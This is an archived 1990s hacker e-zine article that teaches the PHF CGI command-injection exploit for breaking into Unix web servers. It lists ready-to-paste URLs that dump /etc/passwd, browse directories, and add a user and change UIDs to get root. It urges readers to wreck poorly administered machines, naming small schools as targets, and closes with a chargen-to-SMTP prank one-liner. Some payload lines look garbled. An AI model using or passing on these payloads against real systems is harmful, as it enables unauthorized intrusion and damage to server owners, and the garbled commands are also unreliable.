¦ R E A L I T Y C H E C K N E T W O R K! ¦_
+----------------------------------------------------------------------------¦_
¦ ¦
¦ From Issue #33 - PHF Web Hacking ¦
¦ by Dagashi ¦
¦____________________________________________________________________________¦_
¦____________________________________________________________________________¦_
+----------------------------------------------------------------------------¦_
¦ ¦_
¦ Alright there kiddies, it's time to lightly dive into the world of ¦_
¦ how to obtain shells that do not rightfully belong to you and how to ¦_
¦ generally piss off people on the Internet. As always, this is a well ¦_
¦ known bit on information (because no one in their right mind would give ¦_
¦ you an exploit to a system that no one else knows of), so I take no ¦_
¦ responsibility for whatever you do with it. ¦_
¦ ¦_
¦ Since the majority of computers on the Internet are of UNIX decent, ¦_
¦ I will be mainly talk about their problems and such. Now, the majority ¦_
¦ of us know that UNIX is full of holes and other problems no matter what ¦_
¦ revisions and patches are made, so this might not come as a big surprise ¦
¦ when I tell you there is a common exploit that will run any program on ¦
¦ your victim machine. It is the PHF hack. Though it is no big deal to ¦
¦ the majority of ISP's, most little companies do not have the time or ¦
¦ money to deal with all the problems of their operating systems. Small ¦
¦ schools that are NOT technologically oriented, like high schools with ¦
¦ T1's and such would be a good example. And so, this will work on some ¦
¦ of them. ¦
¦ ¦
¦ All that is required to be done is to put this into the URL of ¦
¦ Netscape: ¦
¦ ¦
¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd ¦
¦ ¦
¦ and you have a listing of the passwd file to use or abuse. But the ¦
¦ PHF exploit can do more then just that (for those of you who will be ¦
¦ flaming me for writing such a simple article). It can access any type ¦
¦ of program that is on the opposing computer and run it. ¦
¦ ¦
¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/ ¦
¦ ¦
¦ will give you the directory listing of everything from the root of ¦
¦ the system. From there, you can just alter it accordingly to have a ¦
¦ peek around the system to see what else you can learn. ¦
¦ ¦
¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin ¦
¦ ¦
¦ would show you every command that is available in the bin dir. If ¦
¦ you slightly modified it, you would also be able to see the permissions ¦
¦ of the specific files. ¦
¦ ¦
¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin ¦
¦ ¦
¦ which can come in handy since, well, seeing as how you have root ¦
¦ permissions you now have a nice little bit of information about how the ¦
¦ system functions can use that to get even more access or information out ¦
¦ of it. ¦
¦ ¦
¦ Or the best one of them all: ¦
¦ ¦
¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/adduser%20dagashi ¦
¦ %20dagashi%20100%20 ¦
¦ ¦
¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20dagashi%0 ¦
¦ ¦
¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20root%500 ¦
¦ ¦
¦ Do that and you MIGHT have root access to the server by telnet. Be ¦
¦ forewarned that this is an old hack and many servers would not have the ¦
¦ PHF script still running or have chmoded it to 000. This can get you ¦
¦ into a bunch of trouble, so be careful. As I said before, this is well ¦
¦ known and I wouldn't give it out to you unless most system ¦
¦ administrators (if they deserve the title then they know this hack by ¦
¦ heart) knew it as well. But there are always those that don't deserve ¦
¦ the honor of the name, and to those, you have my full consent to fuck up ¦
¦ their machines to hell. ¦
¦ ¦
¦ For fun and excitement, type "telnet 127.0.0.1 19 | telnet 127.0.0.1 ¦
¦ 25" in Linux and watch life become a ball. ¦
¦ ¦
+----------------------------------------------------------------------------+
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
